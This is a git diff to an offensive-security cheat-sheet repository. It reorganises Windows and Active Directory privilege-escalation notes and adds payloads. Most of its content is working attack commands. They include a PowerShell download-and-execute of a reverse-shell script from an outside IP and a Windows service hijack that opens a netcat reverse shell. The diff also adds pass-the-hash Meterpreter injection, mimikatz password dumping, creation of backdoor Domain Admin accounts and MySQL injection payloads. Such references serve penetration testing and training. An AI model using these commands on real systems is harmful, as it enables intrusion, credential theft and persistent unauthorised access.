diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index e3bfa53..d047367 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -22,11 +22,6 @@ * [Trust relationship between domains](#trust-relationship-between-domains) * [PrivExchange attack](#privexchange-attack) * [Password spraying](#password-spraying) -* [Privilege Escalation](#privilege-escalation) - * [PrivEsc Local Admin - Token Impersonation (RottenPotato)](#privesc-local-admin---token-impersonation-rottenpotato) - * [PrivEsc Local Admin - MS16-032](#privesc-local-admin---ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) - * [PrivEsc Local Admin - MS17-010 (Eternal Blue)](#privesc-local-admin---ms17-010-eternal-blue) - * [From Local Admin to Domain Admin](#from-local-admin-to-domain-admin) ## Tools @@ -56,6 +51,7 @@ git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec crackmapexec smb -L crackmapexec smb -M name_module -o VAR=DATA + crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 @@ -598,56 +594,6 @@ Most of the time the best passwords to spray are : - $Companyname1 -## Privilege Escalation - -### PrivEsc Local Admin - Token Impersonation (RottenPotato) - -Binary available at : https://github.com/foxglovesec/RottenPotato -Binary available at : https://github.com/breenmachine/RottenPotatoNG - -```c -getuid -getprivs -use incognito -list\_tokens -u -cd c:\temp\ -execute -Hc -f ./rot.exe -impersonate\_token "NT AUTHORITY\SYSTEM" -``` - -```powershell -Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" -Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" -Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" -``` - -### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - -Check if the patch is installed : `wmic qfe list | find "3139914"` - -```powershell -Powershell: -https://www.exploit-db.com/exploits/39719/ -https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1 - -Binary exe : https://github.com/Meatballs1/ms16-032 - -Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc -``` - -### PrivEsc Local Admin - MS17-010 (Eternal Blue) - -```c -nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 -``` - -### From Local Admin to Domain Admin - -```powershell -net user hacker2 hacker123 /add /Domain -net group "Domain Admins" hacker2 /add /domain -``` - ## References * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 828e58e..bcf6af3 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -242,6 +242,14 @@ sudo chmod +s /tmp/suid # setuid bit ### Interesting capabilities +Having the capability =ep means the binary has all the capabilities. +```powershell +$ getcap openssl /usr/bin/openssl +openssl=ep +``` + +Alternatively the following capabilities can be used in order to upgrade your current privileges. + ```powershell cap_dac_read_search # read anything cap_setuid+ep # setuid diff --git a/Methodology and Resources/Metasploit - Cheatsheet.md b/Methodology and Resources/Metasploit - Cheatsheet.md index 76e6bcd..c7b9980 100644 --- a/Methodology and Resources/Metasploit - Cheatsheet.md +++ b/Methodology and Resources/Metasploit - Cheatsheet.md @@ -153,7 +153,9 @@ execute -H -i -c -m -d calc.exe -f /root/wce.exe -a -w load mimikatz mimikatz_command -f version mimikatz_command -f samdump::hashes +mimikatz_command -f sekurlsa::wdigest mimikatz_command -f sekurlsa::searchPasswords +mimikatz_command -f sekurlsa::logonPasswords full ``` ```powershell diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index eb43f9e..3975ad9 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -15,6 +15,10 @@ * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [EoP - Insecure GUI apps](#eop---insecure-gui-apps) * [EoP - Runas](#eop---runas) +* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposures) + * [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato) + * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) + * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) ## Tools @@ -421,9 +425,12 @@ You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify ### Example with Windows XP SP1 ```powershell -$ sc config upnphost binpath="C:\Inetpub\wwwroot\nc.exe YOUR_IP 1234 -e C:\WINDOWS\System32\cmd.exe" -sc config upnphost obj=".\LocalSystem" password="" +# NOTE: spaces are mandatory for this exploit to work ! +sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe" +sc config upnphost obj= ".\LocalSystem" password= "" sc qc upnphost +sc config upnphost depend= "" +net start upnphost ``` If it fails because of a missing dependency, try the following commands. @@ -586,6 +593,52 @@ $ computer = "" ``` +## EoP - Common Vulnerabilities and Exposure + +### Token Impersonation (RottenPotato) + +Binary available at : https://github.com/foxglovesec/RottenPotato +Binary available at : https://github.com/breenmachine/RottenPotatoNG + +```c +getuid +getprivs +use incognito +list\_tokens -u +cd c:\temp\ +execute -Hc -f ./rot.exe +impersonate\_token "NT AUTHORITY\SYSTEM" +``` + +```powershell +Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" +Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" +Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" +``` + +### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) + +Check if the patch is installed : `wmic qfe list | find "3139914"` + +```powershell +Powershell: +https://www.exploit-db.com/exploits/39719/ +https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1 + +Binary exe : https://github.com/Meatballs1/ms16-032 + +Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc +``` + +### MS17-010 (Eternal Blue) + +```c +nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 +``` + + + + ## References diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index a2d0ed3..1d32e8c 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -3,9 +3,10 @@ ## TIP 1 - Create your credential :D ```powershell -net user hacker hacker /add +net user hacker hacker1234* /add net localgroup administrators hacker /add -net group "Domain Admins" hacker /ADD /DOMAIN +net localgroup "Remote Desktop Users" hacker /add +net group "Domain Admins" hacker /add /domain ``` Some info about your user diff --git a/Open Redirect/README.md b/Open Redirect/README.md index 80556da..0584673 100644 --- a/Open Redirect/README.md +++ b/Open Redirect/README.md @@ -165,6 +165,7 @@ http://www.example.com/redirect.php?url=javascript:prompt(1) ## References * filedescriptor +* [You do not need to run 80 reconnaissance tools to get access to user accounts - @stefanocoding](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781) * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet) * [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) * [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index b5e5ee1..5a63dd5 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -19,6 +19,7 @@ * [MYSQL Blind with LIKE](#mysql-blind-with-like) * [MYSQL Time Based](#mysql-time-based) * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot) +* [MYSQL Current queries](#mysql-current-queries) * [MYSQL Read content of a file](#mysql-read-content-of-a-file) * [MYSQL Write a shell](#mysql-write-a-shell) * [MYSQL UDF command execution](#mysql-udf-command-execution) @@ -223,6 +224,17 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)# ``` +## MYSQL Current queries + +This table can list all operations that DB is performing at the moment. + +```sql +union SELECT 1,state,info,4 FROM INFORMATION_SCHEMA.PROCESSLIST # + +-- Dump in one shot example for the table content. +union select 1,(select(@)from(select(@:=0x00),(select(@)from(information_schema.processlist)where(@)in(@:=concat(@,0x3C62723E,state,0x3a,info))))a),3,4 # +``` + ## MYSQL Read content of a file Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement` @@ -305,4 +317,5 @@ load data infile '\\\\error\\abc' into table database.table_name; - [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1) - [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/) - [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123) -- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased) \ No newline at end of file +- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased) +- [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100) \ No newline at end of file